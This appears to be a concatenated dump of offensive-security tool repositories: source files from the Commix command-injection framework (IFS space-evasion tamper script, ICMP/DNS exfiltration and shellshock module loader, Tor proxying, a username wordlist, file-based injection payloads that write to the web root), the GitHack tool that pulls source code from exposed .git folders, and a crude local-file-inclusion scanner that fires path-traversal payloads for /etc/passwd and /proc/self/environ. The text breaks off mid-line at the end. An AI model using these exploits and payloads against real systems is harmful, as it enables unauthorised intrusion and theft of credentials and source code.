encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | """ 17 | ANSI color codes 18 | """ 19 | 20 | """ 21 | Font colors 22 | """ 23 | RESET = '\033[0;0m' 24 | BOLD = '\033[1m' 25 | UNDERL = '\033[4m' 26 | GREY = '\033[90m' 27 | RED = '\033[31m' 28 | GREEN = '\033[32m' 29 | YELLOW = '\033[33m' 30 | BLUE = '\033[94m' 31 | PURPLE = '\033[95m' 32 | CYAN = '\033[96m' 33 | DARKCYAN = '\033[36m' 34 | 35 | """ 36 | Background Colors 37 | """ 38 | BGBLACK = '\033[40m' 39 | BGRED = '\033[41m' 40 | BGGREEN = '\033[42m' 41 | BGYELLOW = '\033[43m' 42 | BGBLUE = '\033[44m' 43 | BGMAGENTA = '\033[45m' 44 | BGCYAN = '\033[46m' 45 | BGWHITE = '\033[47m' 46 | 47 | #eof -------------------------------------------------------------------------------- /commix/src/utils/version.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | 18 | from src.utils import settings 19 | from src.thirdparty.colorama import Fore, Back, Style, init 20 | 21 | """ 22 | Show version number and exit. 23 | """ 24 | def show_version(): 25 | print "\n" + settings.VERSION 26 | sys.exit(0) 27 | 28 | """ 29 | Check python version number. 30 | """ 31 | def python_version(): 32 | if settings.PYTHON_VERSION >= "3" or settings.PYTHON_VERSION < "2.6": 33 | err_msg = "Incompatible Python version (" 34 | err_msg += settings.PYTHON_VERSION + ") detected." 35 | print settings.print_critical_msg(err_msg) 36 | sys.exit(0) 37 | -------------------------------------------------------------------------------- /commix/src/core/tamper/space2ifs.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | Replaces space character (' ') with the internal field separator ('$IFS'). 20 | The internal field separator refers to a variable which defines the character 21 | or characters used to separate a pattern into tokens for some operations. 22 | Notes: 23 | * This tamper script works against *nix targets 24 | """ 25 | 26 | if settings.TARGET_OS != "win": 27 | settings.TAMPER_SCRIPTS['space2ifs'] = True 28 | if settings.WHITESPACE[0] == "%20" or settings.WHITESPACE[0] == " ": 29 | settings.WHITESPACE[0] = "${IFS}" 30 | else: 31 | settings.WHITESPACE.append("${IFS}") 32 | else: 33 | warn_msg = "Windows target host(s), does not support the (Bash) $IFS variable." 34 | print settings.print_warning_msg(warn_msg) 35 | 36 | #eof -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/thems_icon.py: -------------------------------------------------------------------------------- 1 | import os 2 | from time import sleep 3 | 4 | 5 | home = ''' 6 | 0 >> config systime 7 | 1 >> install icon 8 | 2 >> insuall themes 9 | ''' 10 | icon = ''' 11 | TOP icon 12 | 1 >> numix 13 | 14 | ''' 15 | print home 16 | sohaip = input('Enter number >>') 17 | print sohaip 18 | if sohaip == 0: 19 | os.system('sudo rm -rf /usr/share/themes/{Arc,Arc-Darker,Arc-Dark}') 20 | os.system('rm -rf ~/.local/share/themes/{Arc,Arc-Darker,Arc-Dark}') 21 | os.system('rm -rf ~/.themes/{Arc,Arc-Darker,Arc-Dark}') 22 | os.system('sudo apt-get install autoconf automake pkg-config libgtk-3-dev') 23 | os.system('apt-get update') 24 | print home 25 | elif sohaip == 1: 26 | print icon 27 | input_icon = input('Enter number>>') 28 | print input_icon 29 | if input_icon == 1: 30 | os.system('sudo apt-add-repository ppa:numix/ppa') 31 | os.system('sudo apt-get update') 32 | os.system('sudo apt-get install numix-icon-theme numix-icon-theme-circle') 33 | elif sohaip == 2: 34 | thems = '''' 35 | 1 >> arc-theme 36 | ''' 37 | print thems 38 | thems_in = input('Enter number >>') 39 | if thems_in == 1: 40 | os.system('git clone https://github.com/horst3180/arc-theme --depth 1 && cd arc-theme') 41 | os.system('./autogen.sh --prefix=/usr') 42 | os.system('sudo make install') 43 | 44 | 45 | -------------------------------------------------------------------------------- /commix/src/txt/usernames.txt: -------------------------------------------------------------------------------- 1 | 111111 2 | 123456 3 | 12345678 4 | abc123 5 | abramov 6 | account 7 | accounting 8 | ad 9 | adm 10 | admin 11 | administrator 12 | adver 13 | advert 14 | advertising 15 | afanasev 16 | agafonov 17 | agata 18 | aksenov 19 | aleksander 20 | aleksandrov 21 | alekse 22 | alenka 23 | alexe 24 | alexeev 25 | alla 26 | anatol 27 | andre 28 | andreev 29 | andrey 30 | anna 31 | anya 32 | ao 33 | aozt 34 | arhipov 35 | art 36 | avdeev 37 | avto 38 | bank 39 | baranov 40 | Baseball 41 | belousov 42 | bill 43 | billing 44 | blinov 45 | bobrov 46 | bogdanov 47 | buh 48 | buhg 49 | buhgalter 50 | buhgalteria 51 | business 52 | bux 53 | catchthismail 54 | company 55 | contact 56 | contactus 57 | corp 58 | design 59 | dir 60 | director 61 | direktor 62 | dragon 63 | economist 64 | edu 65 | email 66 | er 67 | expert 68 | export 69 | fabrika 70 | fin 71 | finance 72 | ftp 73 | glavbuh 74 | glavbux 75 | glbuh 76 | helloitmenice 77 | help 78 | holding 79 | home 80 | hr 81 | iamjustsendingthisleter 82 | info 83 | ingthisleter 84 | job 85 | john 86 | kadry 87 | letmein 88 | mail 89 | manager 90 | marketing 91 | marketing 92 | mike 93 | mogggnomgon 94 | monkey 95 | moscow 96 | mysql 97 | office 98 | ok 99 | oracle 100 | password 101 | personal 102 | petgord34truew 103 | post 104 | postmaster 105 | pr 106 | qwerty 107 | rbury 108 | reklama 109 | root 110 | r00t 111 | sale 112 | sales 113 | secretar 114 | sekretar 115 | support 116 | test 117 | testing 118 | thisisjusttestletter 119 | trade 120 | uploader 121 | user 122 | webmaster 123 | www-data 124 | -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/initialise.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | import atexit 3 | import sys 4 | 5 | from .ansitowin32 import AnsiToWin32 6 | 7 | 8 | orig_stdout = None 9 | orig_stderr = None 10 | 11 | wrapped_stdout = None 12 | wrapped_stderr = None 13 | 14 | atexit_done = False 15 | 16 | 17 | def reset_all(): 18 | AnsiToWin32(orig_stdout).reset_all() 19 | 20 | 21 | def init(autoreset=False, convert=None, strip=None, wrap=True): 22 | 23 | if not wrap and any([autoreset, convert, strip]): 24 | raise ValueError('wrap=False conflicts with any other arg=True') 25 | 26 | global wrapped_stdout, wrapped_stderr 27 | global orig_stdout, orig_stderr 28 | 29 | orig_stdout = sys.stdout 30 | orig_stderr = sys.stderr 31 | 32 | if sys.stdout is None: 33 | wrapped_stdout = None 34 | else: 35 | sys.stdout = wrapped_stdout = \ 36 | wrap_stream(orig_stdout, convert, strip, autoreset, wrap) 37 | if sys.stderr is None: 38 | wrapped_stderr = None 39 | else: 40 | sys.stderr = wrapped_stderr = \ 41 | wrap_stream(orig_stderr, convert, strip, autoreset, wrap) 42 | 43 | global atexit_done 44 | if not atexit_done: 45 | atexit.register(reset_all) 46 | atexit_done = True 47 | 48 | 49 | def deinit(): 50 | if orig_stdout is not None: 51 | sys.stdout = orig_stdout 52 | if orig_stderr is not None: 53 | sys.stderr = orig_stderr 54 | 55 | 56 | def reinit(): 57 | if wrapped_stdout is not None: 58 | sys.stdout = wrapped_stdout 59 | if wrapped_stderr is not None: 60 | sys.stderr = wrapped_stderr 61 | 62 | 63 | def wrap_stream(stream, convert, strip, autoreset, wrap): 64 | if wrap: 65 | wrapper = AnsiToWin32(stream, 66 | convert=convert, strip=strip, autoreset=autoreset) 67 | if wrapper.should_wrap(): 68 | stream = wrapper.stream 69 | return stream 70 | 71 | 72 | -------------------------------------------------------------------------------- /commix/src/core/requests/proxy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | import urllib2 18 | 19 | from src.utils import menu 20 | from src.utils import settings 21 | 22 | from src.core.requests import headers 23 | from src.thirdparty.colorama import Fore, Back, Style, init 24 | 25 | """ 26 | Check if HTTP Proxy is defined. 27 | """ 28 | def do_check(url): 29 | check_proxy = True 30 | info_msg = "Testing proxy " + menu.options.proxy + "... " 31 | sys.stdout.write(settings.print_info_msg(info_msg)) 32 | sys.stdout.flush() 33 | try: 34 | # Check if defined POST data 35 | if menu.options.data: 36 | request = urllib2.Request(url, menu.options.data) 37 | else: 38 | request = urllib2.Request(url) 39 | # Check if defined extra headers. 40 | headers.do_check(request) 41 | request.set_proxy(menu.options.proxy,settings.PROXY_PROTOCOL) 42 | try: 43 | check = urllib2.urlopen(request) 44 | except urllib2.HTTPError, error: 45 | check = error 46 | except: 47 | check_proxy = False 48 | pass 49 | if check_proxy == True: 50 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + " ]\n") 51 | sys.stdout.flush() 52 | else: 53 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 54 | err_msg = "Could not connect to proxy." 55 | print settings.print_critical_msg(err_msg) 56 | sys.exit(0) 57 | 58 | """ 59 | Use the defined HTTP Proxy 60 | """ 61 | def use_proxy(request): 62 | proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy}) 63 | opener = urllib2.build_opener(proxy) 64 | urllib2.install_opener(opener) 65 | response = urllib2.urlopen(request) 66 | 67 | return response -------------------------------------------------------------------------------- /commix/src/core/modules/modules_handler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import os 17 | import sys 18 | 19 | from src.utils import menu 20 | from src.utils import settings 21 | from src.thirdparty.colorama import Fore, Back, Style, init 22 | 23 | """ 24 | Load modules 25 | """ 26 | def load_modules(url, http_request_method, filename): 27 | 28 | # Check if defined the ICMP exfiltration module 29 | if menu.options.ip_icmp_data : 30 | try: 31 | # The ICMP exfiltration module 32 | from src.core.modules.icmp_exfiltration import icmp_exfiltration 33 | # The ICMP exfiltration handler 34 | icmp_exfiltration.icmp_exfiltration_handler(url, http_request_method) 35 | except ImportError as err_msg: 36 | print "\n" + settings.print_critical_msg(err_msg) 37 | sys.exit(0) 38 | sys.exit(0) 39 | 40 | # Check if defined the DNS exfiltration module 41 | if menu.options.dns_server : 42 | try: 43 | # The DNS exfiltration module 44 | from src.core.modules.dns_exfiltration import dns_exfiltration 45 | # The DNS exfiltration handler 46 | dns_exfiltration.dns_exfiltration_handler(url, http_request_method) 47 | except ImportError as err_msg: 48 | print "\n" + settings.print_critical_msg(err_msg) 49 | sys.exit(0) 50 | sys.exit(0) 51 | 52 | # Check if defined the shellshock module 53 | if menu.options.shellshock : 54 | try: 55 | # The shellshock module 56 | from src.core.modules.shellshock import shellshock 57 | # The shellshock handler 58 | shellshock.shellshock_handler(url, http_request_method, filename) 59 | except ImportError as err_msg: 60 | print "\n" + settings.print_critical_msg(err_msg) 61 | sys.exit(0) 62 | sys.exit(0) -------------------------------------------------------------------------------- /commix/src/core/requests/tor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import sys 17 | import urllib2 18 | from src.utils import menu 19 | from src.utils import settings 20 | from src.utils import requirments 21 | from src.thirdparty.colorama import Fore, Back, Style, init 22 | 23 | """ 24 | Check for TOR HTTP Proxy. 25 | """ 26 | if menu.options.tor_port: 27 | PRIVOXY_PORT = menu.options.tor_port 28 | else: 29 | PRIVOXY_PORT = settings.PRIVOXY_PORT 30 | 31 | """ 32 | Check if HTTP Proxy (tor/privoxy) is defined. 33 | """ 34 | def do_check(): 35 | # Check if 'tor' is installed. 36 | requirment = "tor" 37 | requirments.do_check(requirment) 38 | 39 | # Check if 'privoxy' is installed. 40 | requirment = "privoxy" 41 | requirments.do_check(requirment) 42 | 43 | check_privoxy_proxy = True 44 | info_msg = "Testing privoxy proxy settings " 45 | info_msg += settings.PRIVOXY_IP + ":" + PRIVOXY_PORT + "... " 46 | sys.stdout.write(settings.print_info_msg(info_msg)) 47 | sys.stdout.flush() 48 | 49 | try: 50 | privoxy_proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL:settings.PRIVOXY_IP + ":" + PRIVOXY_PORT}) 51 | opener = urllib2.build_opener(privoxy_proxy) 52 | urllib2.install_opener(opener) 53 | 54 | except: 55 | check_privoxy_proxy = False 56 | pass 57 | 58 | if check_privoxy_proxy: 59 | try: 60 | new_ip = opener.open("http://icanhazip.com/").read() 61 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 62 | sys.stdout.flush() 63 | success_msg = "Your ip address appears to be " + new_ip 64 | sys.stdout.write(settings.print_success_msg(success_msg)) 65 | 66 | except urllib2.URLError, err_msg: 67 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 68 | print settings.print_critical_msg(err_msg) 69 | sys.exit(0) 70 | 71 | """ 72 | Use the TOR HTTP Proxy. 73 | """ 74 | def use_tor(request): 75 | if menu.options.offline: 76 | err_msg = "You cannot Tor network without access on the Internet." 77 | print settings.print_critical_msg(err_msg) 78 | sys.exit(0) 79 | 80 | privoxy_proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL:settings.PRIVOXY_IP + ":" + PRIVOXY_PORT}) 81 | opener = urllib2.build_opener(privoxy_proxy) 82 | urllib2.install_opener(opener) 83 | response = urllib2.urlopen(request) 84 | return response 85 | 86 | #eof -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/ansi.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | ''' 3 | This module generates ANSI character codes to printing colors to terminals. 4 | See: http://en.wikipedia.org/wiki/ANSI_escape_code 5 | ''' 6 | 7 | CSI = '\033[' 8 | OSC = '\033]' 9 | BEL = '\007' 10 | 11 | 12 | def code_to_chars(code): 13 | return CSI + str(code) + 'm' 14 | 15 | 16 | class AnsiCodes(object): 17 | def __init__(self, codes): 18 | for name in dir(codes): 19 | if not name.startswith('_'): 20 | value = getattr(codes, name) 21 | setattr(self, name, code_to_chars(value)) 22 | 23 | 24 | class AnsiCursor(object): 25 | def UP(self, n=1): 26 | return CSI + str(n) + "A" 27 | def DOWN(self, n=1): 28 | return CSI + str(n) + "B" 29 | def FORWARD(self, n=1): 30 | return CSI + str(n) + "C" 31 | def BACK(self, n=1): 32 | return CSI + str(n) + "D" 33 | def POS(self, x=1, y=1): 34 | return CSI + str(y) + ";" + str(x) + "H" 35 | 36 | def set_title(title): 37 | return OSC + "2;" + title + BEL 38 | 39 | def clear_screen(mode=2): 40 | return CSI + str(mode) + "J" 41 | 42 | def clear_line(mode=2): 43 | return CSI + str(mode) + "K" 44 | 45 | 46 | class AnsiFore: 47 | BLACK = 30 48 | RED = 31 49 | GREY = 90 50 | GREEN = 32 51 | YELLOW = 33 52 | BLUE = 34 53 | MAGENTA = 35 54 | CYAN = 36 55 | WHITE = 37 56 | RESET = 39 57 | 58 | # These are fairly well supported, but not part of the standard. 59 | LIGHTBLACK_EX = 90 60 | LIGHTRED_EX = 91 61 | LIGHTGREEN_EX = 92 62 | LIGHTYELLOW_EX = 93 63 | LIGHTBLUE_EX = 94 64 | LIGHTMAGENTA_EX = 95 65 | LIGHTCYAN_EX = 96 66 | LIGHTWHITE_EX = 97 67 | 68 | 69 | class AnsiBack: 70 | BLACK = 40 71 | RED = 41 72 | GREEN = 42 73 | YELLOW = 43 74 | BLUE = 44 75 | MAGENTA = 45 76 | CYAN = 46 77 | WHITE = 47 78 | RESET = 49 79 | 80 | # These are fairly well supported, but not part of the standard. 81 | LIGHTBLACK_EX = 100 82 | LIGHTRED_EX = 101 83 | LIGHTGREEN_EX = 102 84 | LIGHTYELLOW_EX = 103 85 | LIGHTBLUE_EX = 104 86 | LIGHTMAGENTA_EX = 105 87 | LIGHTCYAN_EX = 106 88 | LIGHTWHITE_EX = 107 89 | 90 | 91 | class AnsiStyle: 92 | BRIGHT = 1 93 | DIM = 2 94 | UNDERLINE = 4 95 | NORMAL = 22 96 | RESET_ALL = 0 97 | 98 | Fore = AnsiCodes( AnsiFore ) 99 | Back = AnsiCodes( AnsiBack ) 100 | Style = AnsiCodes( AnsiStyle ) 101 | Cursor = AnsiCursor() 102 | -------------------------------------------------------------------------------- /GitHack/GitHack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | 4 | import sys 5 | import urllib2 6 | import os 7 | import urlparse 8 | import zlib 9 | import threading 10 | import Queue 11 | import re 12 | import time 13 | from lib.parser import parse 14 | 15 | 16 | if len(sys.argv) == 1: 17 | msg = """ 18 | 19 | A `.git` folder disclosure exploit. By LiJieJie 20 | 21 | Usage: GitHack.py http://www.target.com/.git/ 22 | 23 | bug-report: my[at]lijiejie.com (http://www.lijiejie.com) 24 | """ 25 | print msg 26 | sys.exit(0) 27 | 28 | 29 | class Scanner(object): 30 | def __init__(self): 31 | self.base_url = sys.argv[-1] 32 | self.domain = urlparse.urlparse(sys.argv[-1]).netloc.replace(':', '_') 33 | if not os.path.exists(self.domain): 34 | os.mkdir(self.domain) 35 | print '[+] Download and parse index file ...' 36 | data = self._request_data(sys.argv[-1] + '/index') 37 | with open('index', 'wb') as f: 38 | f.write(data) 39 | self.queue = Queue.Queue() 40 | for entry in parse('index'): 41 | if "sha1" in entry.keys(): 42 | self.queue.put((entry["sha1"].strip(), entry["name"].strip())) 43 | try: 44 | print entry['name'] 45 | except: 46 | pass 47 | self.lock = threading.Lock() 48 | self.thread_count = 20 49 | self.STOP_ME = False 50 | 51 | def _request_data(self, url): 52 | request = urllib2.Request(url, None, {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'}) 53 | return urllib2.urlopen(request).read() 54 | 55 | def _print(self, msg): 56 | self.lock.acquire() 57 | print msg 58 | self.lock.release() 59 | 60 | def get_back_file(self): 61 | while not self.STOP_ME: 62 | try: 63 | sha1, file_name = self.queue.get(timeout=0.5) 64 | except: 65 | break 66 | for i in range(3): 67 | try: 68 | folder = '/objects/%s/' % sha1[:2] 69 | data = self._request_data(self.base_url + folder + sha1[2:]) 70 | try: 71 | data = zlib.decompress(data) 72 | except: 73 | self._print('[Error] Fail to decompress %s' % file_name) 74 | data = re.sub('blob \d+\00', '', data) 75 | target_dir = os.path.join(self.domain, os.path.dirname(file_name) ) 76 | if target_dir and not os.path.exists(target_dir): 77 | os.makedirs(target_dir) 78 | with open( os.path.join(self.domain, file_name) , 'wb') as f: 79 | f.write(data) 80 | self._print('[OK] %s' % file_name) 81 | break 82 | except urllib2.HTTPError, e: 83 | if str(e).find('HTTP Error 404') >=0: 84 | self._print('[File not found] %s' % file_name) 85 | break 86 | except Exception, e: 87 | self._print('[Error] %s' % e) 88 | self.exit_thread() 89 | 90 | def exit_thread(self): 91 | self.lock.acquire() 92 | self.thread_count -= 1 93 | self.lock.release() 94 | 95 | def scan(self): 96 | for i in range(self.thread_count): 97 | t = threading.Thread(target=self.get_back_file) 98 | t.start() 99 | 100 | 101 | s = Scanner() 102 | s.scan() 103 | try: 104 | while s.thread_count > 0: 105 | time.sleep(0.1) 106 | except KeyboardInterrupt, e: 107 | s.STOP_ME = True 108 | time.sleep(1.0) 109 | print 'User Aborted.' -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/local.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import urllib2 4 | import re 5 | from time import sleep 6 | 7 | home = ''' 8 | ==========================================================================================================| 9 | |============================================[sohaip-hackerDZ ]===========================================| 10 | |=====================================[http://python-root.blogspot.com ]=================================| 11 | |================================[https://www.facebook.com/sohaipbarika]==================================| 12 | |=========================================================================================================| 13 | | local file include scaner | 14 | |=========================================================================================================| 15 | ''' 16 | print home 17 | 18 | 19 | 20 | sohaip = raw_input ("enter TARGET >>") 21 | 22 | etc_passwd = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00"] 23 | 24 | environ = ["/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00"] 25 | 26 | print ("\n[*] GET >> passwd") 27 | try: 28 | for inc in etc_passwd: 29 | hackerDZ = sohaip + inc 30 | response = urllib2.urlopen(hackerDZ).read() 31 | find = re.findall("root:x:",response) 32 | if find: 33 | print("[+]scaner don ->") 34 | sleep(1) 35 | print("[+]wite pless ->") 36 | sleep(1) 37 | print("[+]wite pless ->") 38 | sleep(1) 39 | print("[+]wite pless ->") 40 | sleep(1) 41 | print("[+]wite pless ->") 42 | sleep(1) 43 | print("[+]wite pless ->") 44 | sleep(1) 45 | print "[+]GET LFI -> " + hackerDZ 46 | elif find: 47 | print("erorr") 48 | 49 | except (KeyboardInterrupt, SystemExit): 50 | print("work is finished") 51 | 52 | print ("\n[*] GET >> environ") 53 | try: 54 | for inc in environ: 55 | hackerDZ = sohaip + inc 56 | response = urllib2.urlopen(hackerDZ).read() 57 | find = re.findall("DOCUMENT_ROOT",response) 58 | if find: 59 | print("[+]scaner don ->") 60 | sleep(1) 61 | print("[+]wite pless ->") 62 | sleep(1) 63 | print("[+]wite pless ->") 64 | sleep(1) 65 | print("[+]wite pless ->") 66 | sleep(1) 67 | print("[+]wite pless ->") 68 | sleep(1) 69 | print("[+]wite pless ->") 70 | sleep(1) 71 | print "[+] GET LFI -> " + hackerDZ 72 | elif find: 73 | print('erorr') 74 | except (KeyboardInterrupt, SystemExit): 75 | print("work is finished") -------------------------------------------------------------------------------- /commix/src/utils/simple_http_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import re 17 | import sys 18 | import errno 19 | import thread 20 | import socket 21 | import SocketServer 22 | from os import curdir, sep 23 | from src.utils import menu 24 | from src.utils import settings 25 | from socket import error as socket_error 26 | from src.thirdparty.colorama import Fore, Back, Style, init 27 | from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer 28 | 29 | """ 30 | Validates IPv4 addresses. 31 | """ 32 | def is_valid_ipv4(ip_addr): 33 | pattern = re.compile(r""" 34 | ^ 35 | (?: 36 | # Dotted variants: 37 | (?: 38 | # Decimal 1-255 (no leading 0's) 39 | [3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2} 40 | | 41 | 0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's) 42 | | 43 | 0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's) 44 | ) 45 | (?: # Repeat 0-3 times, separated by a dot 46 | \. 47 | (?: 48 | [3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2} 49 | | 50 | 0x0*[0-9a-f]{1,2} 51 | | 52 | 0+[1-3]?[0-7]{0,2} 53 | ) 54 | ){0,3} 55 | | 56 | 0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff 57 | | 58 | 0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777 59 | | 60 | # Decimal notation, 1-4294967295: 61 | 429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}| 62 | 42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}| 63 | 4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8} 64 | ) 65 | $ 66 | """, re.VERBOSE | re.IGNORECASE) 67 | return pattern.match(ip_addr) is not None 68 | 69 | def grab_ip_addr(): 70 | try: 71 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 72 | s.connect(("8.8.8.8",53)) 73 | s.settimeout(2) 74 | ip_addr = s.getsockname()[0] 75 | s.close() 76 | return ip_addr 77 | except socket_error, err_msg: 78 | if errno.ECONNREFUSED: 79 | warn_msg = "Internet seems unreachable." 80 | print settings.print_warning_msg(warn_msg) 81 | else: 82 | print settings.print_critical_msg(str(err_msg)) + "\n" 83 | sys.exit(0) 84 | 85 | class Handler(BaseHTTPRequestHandler): 86 | def do_GET(self): 87 | try: 88 | #Open the static file requested and send it 89 | f = open(curdir + sep + self.path) 90 | self.send_response(200) 91 | self.end_headers() 92 | self.wfile.write(f.read()) 93 | f.close() 94 | 95 | except IOError: 96 | self.wfile.write(settings.APPLICATION + "/v" + settings.VERSION) 97 | 98 | def log_message(self, format, *args): 99 | return 100 | 101 | class ReusableTCPServer(SocketServer.TCPServer): 102 | allow_reuse_address = True 103 | 104 | def main(): 105 | try: 106 | connection_refused = False 107 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 108 | except socket_error: 109 | if errno.ECONNREFUSED: 110 | connection_refused = True 111 | if connection_refused == False: 112 | # Start the server in a background thread. 113 | httpd = ReusableTCPServer(('', settings.LOCAL_HTTP_PORT), Handler) 114 | thread.start_new_thread(httpd.serve_forever, ()) 115 | -------------------------------------------------------------------------------- /commix/src/core/injections/semiblind/techniques/file_based/fb_payloads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | """ 17 | The "file-based" technique on semiblind OS command injection. 18 | The available "file-based" payloads. 19 | """ 20 | 21 | from src.utils import menu 22 | from src.utils import settings 23 | 24 | """ 25 | File-based decision payload (check if host is vulnerable). 26 | """ 27 | def decision(separator, TAG, OUTPUT_TEXTFILE): 28 | 29 | if settings.TARGET_OS == "win": 30 | payload = (separator + 31 | "powershell.exe -InputFormat none Add-Content " + 32 | OUTPUT_TEXTFILE + " " + TAG 33 | ) 34 | else: 35 | payload = (separator + 36 | "echo " + TAG + ">" + settings.WEB_ROOT + OUTPUT_TEXTFILE 37 | ) 38 | 39 | return payload 40 | 41 | """ 42 | __Warning__: The alternative shells are still experimental. 43 | """ 44 | def decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE): 45 | 46 | if settings.TARGET_OS == "win": 47 | python_payload = settings.WIN_PYTHON_DIR 